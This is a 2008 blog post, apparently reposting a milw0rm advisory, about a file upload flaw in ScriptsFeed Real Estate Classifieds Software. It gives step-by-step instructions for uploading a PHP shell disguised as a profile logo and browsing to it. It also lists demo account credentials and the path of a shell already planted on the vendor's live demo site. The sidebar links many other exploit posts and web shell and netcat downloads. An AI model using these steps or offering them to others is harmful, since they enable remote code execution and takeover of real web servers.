ScriptsFeed (SF) Real Estate Classifieds Software File Upload Vuln
link: http://www.milw0rm.com/exploits/7110
Discovered By: ZoRLu
Exploit:
http://localhost/script/re_images/[id]_logo_your_shell.php
you register to site
register: http://localhost/script/register.php
after you login to site
login: http://localhost/script/login.php
more after you go profile edit
profile: http://localhost/script/profile.php
and you upload your_shell.php right click to your logo and select properties copy link
paste your explorer go your_shell.php
your_shell.php path:
http://localhost/script/re_images/[id]_logo_your_shell.php
rfu for demo:
user: zorlu
passwd: zorlu1
shell path:
http://www.scriptsfeed.com/demos/realtor_web_6/re_images/1226595925_logo_c.php
skip to main |
skip to sidebar
"Şeytan İçinde ki Sestir; O Sese Kulak Ver"-Zorlu BUĞRAHAN-
About Me
Blog Archive
-
▼
2008
(193)
-
▼
Kasım
(62)
- Star Articles 6.0 Remote File Upload Vulnerability
- Kurtlar Vadisi Pusu 48. Bölüm Fragman
- FAQ Manager 1.2 (config_path) Remote File Inclusio...
- Clean CMS 1.5 (Blind SQL Injection/XSS) Multiple R...
- Chipmunk Topsites (Auth Bypass/XSS) Multiple Remot...
- Pie Web M{a,e}sher Mod Rss 0.1 Remote File Inclusi...
- Bandwebsite 1.5 (SQL/XSS) Multiple Remote Vulnerab...
- PG Job Site (poll_view_id) Blind SQL Injection Vul...
- PG Roomate Finder Solution (Auth Bypass) SQL Injec...
- PG Real Estate (Auth Bypass) SQL Injection Vulnera...
- lütfen demoları hacklemeyin - pls you dont make ha...
- getaphpsite Auto Dealers Remote File Upload Vulner...
- getaphpsite Real Estate Remote File Upload Vulnera...
- zehir4.asp download
- Kurtlar Vadisi Pusu 47. Bölüm Fragman
- Jadu Galaxies (categoryID) Blind SQL Injection Vul...
- mola : (
- turnkeyforms Text Link Sales (id) XSS/SQL Injectio...
- X7 Chat 2.0.5 (Auth Bypass) SQL Injection Vulnerab...
- GS Real Estate Portal US/International Module Mult...
- netcat download
- BosClassifieds hack video
- bu fakelerin modası geçmedi mi henüz : )
- ScriptsFeed (SF) Real Estate Classifieds Software ...
- ScriptsFeed (SF) Auto Classifieds Software Remote ...
- ScriptsFeed (SF) Recipes Listing Portal Remote Fil...
- Kurtlar Vadisi Pusu 46. Bölüm Fragman
- AlstraSoft Web Host Directory (Auth Bypass) SQL In...
- AlstraSoft Article Manager Pro (Auth Bypass) SQL I...
- AlstraSoft SendIt Pro Remote File Upload Vulnerabi...
- a.q gecenin bu saatinde ödev hazırlıyorum : (
- PHPStore Real Estate Remote File Upload Vulnerability
- PHPStore Complete Classifieds Script File Upload V...
- PHPStore PHP Job Search Script Remote File Upload ...
- PHPStore Car Dealers Remote File Upload Vulnerability
- Galatasaray - fenerbahçe 4-1
- Ali Kınık - Asın Beni
- ZEEJOBSITE 2.0 Remote File Upload Vulnerability
- zeeproperty 1.0 (Upload/XSS) Multiple Remote Vulne...
- DeltaScripts PHP Classifieds <= 7.5 SQL Injection ...
- MyioSoft EasyCalendar (Auth Bypass) Remote SQL Inj...
- MyioSoft EasyBookMarker (Auth Bypass) SQL Injectio...
- MyioSoft Ajax Portal 3.0 (Auth Bypass) SQL Injecti...
- Güneşin Oğlu Fragman
- E-topbiz Online Store 1 (Auth Bypass) SQL Injectio...
- DeltaScripts PHP Shop 1.0 (Auth Bypass) SQL Inject...
- DeltaScripts PHP Links <= 1.3 (Auth Bypass) SQL In...
- DeltaScripts PHP Classifieds <= 7.5 (Auth Bypass) ...
- kurtlar vadisi pusu 45. bölüm fragman şükür kavuşt...
- kpss çalışcam a.q kpss : (
- online rekorunu bugün kırdı sitem :)
- Apoll 0.7b (SQL Injection) Remote Auth Bypass Vuln...
- MatPo Link 1.2b (view.php id) Remote SQL Injection...
- BosDev BosClassifieds (cat_id) SQL Injection Vulne...
- Joovili 3.1.4 Insecure Cookie Handling Vulnerability
- Apartment Search Script (RFU/XSS) Multiple Remote ...
- Article Publisher PRO 1.5 Insecure Cookie Handling...
- SFS EZ Webstore (where) Remote SQL Injection Vulne...
- SFS EZ Gaming Cheats (id) Remote SQL Injection vul...
- eskişehir fenerbahçe maç bitti 2-2
- eskişehir fenerbahçe maçı
- Logz podcast CMS 1.3.1 (add_url.php art) SQL Injec...
-
▼
Kasım
(62)
İzleyiciler
zorlu kimdir? züktür et ;)
Bağlantılarım
-
Inj3ct0r.com
Copyright © ZoRLu | ZRL | Buffer Overflow. All rights reserved.
Blogger templates created by Templates Block
Wordpress theme by Dieter Schneider
Blogger templates created by Templates Block
Wordpress theme by Dieter Schneider
0 yorum:
Yorum Gönder